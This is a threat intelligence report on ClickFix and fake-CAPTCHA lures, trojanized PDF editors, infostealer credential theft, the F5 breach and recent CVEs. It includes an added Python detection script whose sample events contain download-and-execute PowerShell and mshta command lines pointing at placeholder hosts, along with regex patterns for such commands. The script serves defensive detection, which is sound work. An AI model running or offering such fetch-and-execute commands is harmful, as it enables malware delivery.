Cyber Threat Intelligence | PacketWatch

Cyber Threat Intelligence Report | 10/20/2025 | PacketWatch

Written by The PacketWatch Intelligence Team | October 20, 2025

 

This week, for Cybersecurity Awareness Month, we briefed our clients on the most common threats facing every organization (hint: they tend to target users).

 

 KEY TAKEAWAYS 

  • Cybersecurity Awareness Month – ClickFix/FakeCAPTCHA/FileFix, fake software downloads, credential attacks, and an increase in vulnerabilities.

  • The F5 Incident – what we know and how to protect your organization.

  • Critical and high-severity vulnerabilities in Oracle, Microsoft, Veeam, SAP, 7-Zip, and Ivanti, plus updates to CISA KEV, patch now!


 

Cybersecurity Awareness Month

 Last year's Cybersecurity Awareness Month articles went back to basics, covering passwords and MFA, patching, logging, auditing, backups, and (mis)configurations. This year, we will take a look at some of the most common threats facing every organization today. These threats tend to target the end user, and oftentimes lead to devastating impact such as ransomware or data exfiltration if not remediated appropriately. 

 

ClickFix / Fake CAPTCHA / FileFix

This style of attack has been around for well over a year now, but its usage by threat actors continues to increase, and is a popular way for threat actors to either gain initial access into an environment, or deploy infostealer malware. The attack occurs when a user visits either a compromised site (drive-by attack) or is tricked into visiting an attacker-controlled site via phishing or SEO abuse. The victim is then presented with a prompt similar to this: 

 

 Fig 1: Fake CAPTCHA Example | Source: Elastic Security 

 

If the victim follows the steps shown, they open the Run dialog box (some variants instead instruct them to open PowerShell or CMD), paste in the malicious code, and execute it. The sequence gets the victim to run the malicious code on the threat actor's behalf. In most cases, this initial code downloads and executes a malicious file, establishing a foothold on that endpoint.

User awareness training is the most effective defense against these threats. Additionally, users' ability to use the Windows Run command, as well as their access to PowerShell or the Command Prompt, can be restricted via GPO.
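As an added example (not from the PacketWatch report), a triage pass over constructed Sysmon Event ID 1 style process-creation records: a pasted ClickFix/FileFix command shows up as powershell, cmd or mshta spawned directly by explorer.exe (both the Run dialog and the File Explorer address bar are hosted there) with download-and-execute traits on the command line. The field names, URLs and sample events are assumed and constructed for the demonstration.

```python
import re

# Constructed Sysmon Event ID 1 style records (assumed field names), not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://verify.example.invalid/v | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://captcha.example.invalid/check"},
    {"ParentImage": r"C:\Windows\explorer.exe",   # benign: user-run script, no download traits
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Users\jdoe\Documents\report.ps1"},
    {"ParentImage": r"C:\Program Files\Vendor\Agent\agent.exe",   # benign: not user-initiated
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
]

# Interpreters a pasted ClickFix/FileFix command typically lands in.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits of a download-and-execute one-liner; each hit is reported by name.
INDICATORS = {
    "download-cmdlet": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|bitsadmin)\b", re.I),
    "exec-cmdlet": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded-command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "mshta-url": re.compile(r"^mshta\s+https?://", re.I),
}

def triage(events):
    """Return (index, [indicator names]) for events matching the ClickFix/FileFix pattern."""
    hits = []
    for i, ev in enumerate(events):
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        # Shell spawned by explorer.exe = typed or pasted by the user (Run dialog, address bar).
        if parent != "explorer.exe" or image not in SHELLS:
            continue
        reasons = [name for name, rx in INDICATORS.items() if rx.search(ev["CommandLine"])]
        if reasons:   # parent/child alone is too noisy; require a download/execute trait too
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for idx, why in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx]['CommandLine']!r} -> {', '.join(why)}")
```

Events 0 and 1 are flagged; the user-run script (event 2) passes because it carries no download or hidden-window trait, and the agent-spawned shell (event 3) is never considered.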

 

Fake Software Downloads

Multiple malware campaigns in recent months have been aggressively pushing fake software downloads that come bundled with infostealer malware. Just last month, we detailed a campaign dubbed TamperedChef, which distributed malware via a free PDF tool called "AppSuite PDF Editor". Threat actors were able to widely distribute this fake PDF application through SEO and malvertising. Additionally, in order to let the malware spread as widely as possible before it was detected, the file behaved benignly for months before the malicious payload was finally triggered.

PacketWatch observed a similar campaign just last week with another PDF editor called "CrystalPDF". Similar to the AppSuite PDF editor, the download site for CrystalPDF was established in 2024, and only recently did the binary get reported as malicious.

Application allow-listing, or having a default-deny policy on software, is the best defense against these threats. Users should only be allowed to run pre-approved software on their systems. Additionally, administrators should restrict the permissions of regular user accounts. Regular users do not need administrative permissions on their systems.

 

Credential Attacks (from Infostealers)

Credential-based attacks have been surging, fueled by a massive increase (over 800%) in stolen credentials in 2025 versus the previous year. This stark increase in compromised accounts is tied to the increase in systems compromised with infostealer malware, delivered via the methods described above. These attacks are especially effective in environments that do not have multi-factor authentication (MFA) deployed.

Having fully up-to-date EDR solutions deployed on every possible endpoint will help prevent execution of infostealers. Implementing MFA on every account that has remote authentication capabilities is the most effective control against credential attacks. Additionally, dark web monitoring services can help identify compromised accounts so their credentials can be changed proactively.

 

Increase in CVEs, Increase in Scanning

2024 saw a record-breaking 40,009 vulnerabilities reported, and 2025 is trending to have even more. Unfortunately, many of these vulnerabilities reside in security tools that are supposed to protect the network and instead create open doors for threat actors to gain access. This includes devices such as firewalls, SSLVPNs, load balancers, secure access gateways, etc. With the increasing use of AI to write software, it is likely even more vulnerabilities will be introduced in the coming years. 

Recent reports show threat actors scanning the internet for vulnerable Cisco, Fortinet, and Palo Alto devices, and for vulnerable services such as RDP. This scanning activity can precede a 0-day attack, where the threat actor exploits a previously unknown vulnerability that has no patch, or the scans can target recently disclosed vulnerabilities. Threat actors are able to weaponize and mass-exploit critical vulnerabilities in edge devices within 24-48 hours of disclosure.

Patching has always been an important aspect of cybersecurity, but in 2025, it is crucial to implement security patches as soon as possible. In addition to patching, organizations can reduce their attack surface by closing unused/unnecessary ports and services and removing management interfaces from the open internet. 

 


The F5 Incident - What We Know

Last week on October 15, F5 disclosed details of a major network breach. As the week went by, security news feeds were alight with articles and notifications regarding this incident. This article attempts to summarize key points and findings so organizations can take appropriate actions to protect themselves.

In the security advisory published by F5 on October 15, they state that they learned a "highly sophisticated nation-state threat actor" maintained "long-term, persistent access to, and downloaded files from, certain F5 systems." This discovery was made in August 2025. The threat actor's persistent access included systems in product development and engineering knowledge management platforms. F5 also disclosed the threat actor exfiltrated files from these systems, including F5 BIG-IP source code, and information about undisclosed vulnerabilities in the BIG-IP platform.

Per F5's advisory, they found no evidence of modification to their software supply chain (source, build, and release pipelines); no evidence of access to NGINX, F5 Distributed Cloud Services, or Silverline environments; and no evidence of access to F5 CRM, financial, support case systems, or iHealth. However, it was determined that configuration and implementation information for a small percentage of customers was exfiltrated, and those customers have been notified directly by F5.

Administrators are strongly urged to review the F5 Quarterly Security Notification and apply all applicable patches as soon as possible. Additionally, F5 updated the "Hardening Your F5 System" guide with up-to-date guidance. These best practices should be reviewed and implemented in order to reduce the potential attack surface of F5 systems. Lastly, CISA published an advisory with mitigation strategies for F5 devices.

 


Vulnerability Roundup

 

Oracle Patches Another Vulnerability in E-Business Suite (EBS)

Last week, Oracle released an emergency patch for another vulnerability in their EBS platform. Tracked as CVE-2025-61884, the flaw is remotely exploitable without authentication, and successful exploitation can give the threat actor access to "sensitive resources" leading to information disclosure. The vulnerability affects Oracle EBS versions 12.2.3-12.2.14. Administrators are urged to patch as soon as possible, as this vulnerability and other recent vulnerabilities in this product are under active exploitation. 

 

Microsoft Patch Tuesday

On October 14, Microsoft released security updates for its fleet of products in the monthly Patch Tuesday. This particular set of patches stands out as it is the last security update for Windows 10. While it is highly recommended that all Windows 10 endpoints be upgraded to Windows 11 so they can keep receiving security updates, any devices in your environment that are still on Windows 10 should have these latest Patch Tuesday updates applied. It should also be noted that several vulnerabilities addressed in this round of updates have already been exploited in the wild, including CVE-2025-24052, CVE-2025-24990, and CVE-2025-59230 (all privilege escalation vulnerabilities).

 

Critical Vulnerabilities Fixed for Veeam

On October 14, Veeam published a security bulletin detailing a set of vulnerabilities affecting Veeam Backup & Replication. Two of the vulnerabilities, CVE-2025-48983 and CVE-2025-48984, are rated critical and allow for remote code execution on the Backup Server. It should be noted that these vulnerabilities can only be exploited by "an authenticated domain user". Backup servers that are not domain-joined are not impacted by these vulnerabilities. Veeam Backup & Replication version 12.3.2.3617 and all earlier version 12 builds are vulnerable.

Additionally, the bulletin addresses CVE-2025-48982, a local privilege escalation vulnerability in Veeam Agent for Microsoft Windows. This vulnerability affects Veeam Agent for Microsoft Windows version 6.3.2.1205 and all earlier version 6 builds.

 

Maximum Severity Vulnerability in SAP NetWeaver

Last week, SAP rolled out 13 fixes for their October Security Patch Day. Among these fixes is a patch for a maximum severity insecure deserialization vulnerability in SAP NetWeaver. Tracked as CVE-2025-42944, it allows an "unauthenticated attacker to exploit the system through the RMI-P4 module by submitting a malicious payload to an open port." This vulnerability was actually addressed in the September Patch Day, but this new set of fixes applies additional hardening measures. Administrators are urged to apply the new patches as soon as possible. 

 

7-Zip Fixes High-Severity Vulnerabilities

Two high-severity issues, tracked as CVE-2025-11001 and CVE-2025-11002, have been addressed by 7-Zip. Both vulnerabilities are exploited the same way: a threat actor sends the victim a malicious archive file. If the victim opens the file, the vulnerabilities allow the process to write files outside of the intended destination folder, which lets the threat actor place malicious files or payloads in potentially sensitive system locations. These vulnerabilities affect all 7-Zip versions before version 25.00. Administrators are urged to patch as soon as possible.

 

Ivanti Patches 13 New Vulnerabilities

On October 13, Ivanti released a security advisory detailing 13 high- and medium-severity vulnerabilities in its Endpoint Manager solution. Successful exploitation of these vulnerabilities can lead to privilege escalation or remote code execution. This set of vulnerabilities affects Ivanti Endpoint Manager versions 2024 SU3 SR1 and prior, as well as 2022 SU8 SR2 and prior (this version is end-of-life). Administrators are urged to apply these patches as soon as possible, as Ivanti vulnerabilities are frequently targeted by ransomware and extortion groups.

 

CISA KEV Additions

The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last 2 weeks:

  • CVE-2025-61884 – Oracle E-Business Suite Server-Side Request Forgery (SSRF) Vulnerability
  • CVE-2025-33073 – Microsoft Windows SMB Client Improper Access Control Vulnerability
  • CVE-2025-2747 – Kentico Xperience CMS Authentication Bypass Using an Alternate Path or Channel Vulnerability
  • CVE-2025-2746 – Kentico Xperience CMS Authentication Bypass Using an Alternate Path or Channel Vulnerability
  • CVE-2022-48503 – Apple Multiple Products Unspecified Vulnerability
  • CVE-2025-54253 – Adobe Experience Manager Forms Code Execution Vulnerability
  • CVE-2016-7836 – SKYSEA Client View Improper Authentication Vulnerability
  • CVE-2025-6264 – Rapid7 Velociraptor Incorrect Default Permissions Vulnerability
  • CVE-2025-59230 – Microsoft Windows Improper Access Control Vulnerability
  • CVE-2025-24990 – Microsoft Windows Untrusted Pointer Dereference Vulnerability
  • CVE-2025-47827 – IGEL OS Use of a Key Past its Expiration Date Vulnerability
  • CVE-2021-43798 – Grafana Path Traversal Vulnerability
  • CVE-2025-27915 – Synacor Zimbra Collaboration Suite (ZCS) Cross-site Scripting Vulnerability
  • CVE-2025-61882 – Oracle E-Business Suite Unspecified Vulnerability
  • CVE-2010-3765 – Mozilla Multiple Products Remote Code Execution Vulnerability
  • CVE-2011-3402 – Microsoft Windows Remote Code Execution Vulnerability
  • CVE-2013-3918 – Microsoft Windows Out-of-Bounds Write Vulnerability
  • CVE-2021-43226 – Microsoft Windows Privilege Escalation Vulnerability
  • CVE-2010-3962 – Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
  • CVE-2021-22555 – Linux Kernel Heap Out-of-Bounds Write Vulnerability

 

 

 

This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.

 


NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.